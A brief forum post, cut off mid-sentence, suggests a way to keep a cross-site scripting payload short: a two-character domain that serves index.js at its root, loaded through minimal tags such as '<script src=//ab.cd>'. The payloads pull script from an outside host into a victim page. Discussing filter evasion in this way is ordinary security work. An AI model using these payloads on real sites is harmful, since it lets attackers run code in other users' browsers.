Posted by waysea on Dec 03

If you can get a <script> tag in (usually the very first tag to be
blacklisted), you could
1. register a two character domain with a two character TLD (all the
single character domains with two letter TLDs had been taken the last
time I checked)
2. have the root page be an index.js file (instead of index.html)
3. use something like:

A) <script src=//ab.cd>
or
B) <script/src=//ef.gh>

Without knowing more about your specific…